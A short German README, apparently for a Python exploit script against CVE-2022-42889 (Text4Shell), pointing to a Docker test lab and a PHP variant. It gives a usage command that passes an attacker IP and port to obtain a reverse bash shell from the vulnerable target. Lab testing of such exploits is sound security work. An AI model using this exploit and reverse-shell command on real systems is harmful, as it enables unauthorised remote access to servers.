
Python-Skript für CVE-2022-42889
Python-Skript für CVE-2022-42889
Um dies lokal zu testen, folge dem Docker-POC: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
Für eine PHP-Version davon: https://github.com/ClickCyber/cve-2022-42889
Wenn du dies ausführst und lokal ausnutzt, musst du die IP des Gateways verwenden, das beim Erstellen des Docker-Containers generiert wird.
Nachdem du eine Bash-Shell auf dem Docker-Container erhalten hast

Stelle sicher, dass du das Skript mit chmod ausführbar machst.
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889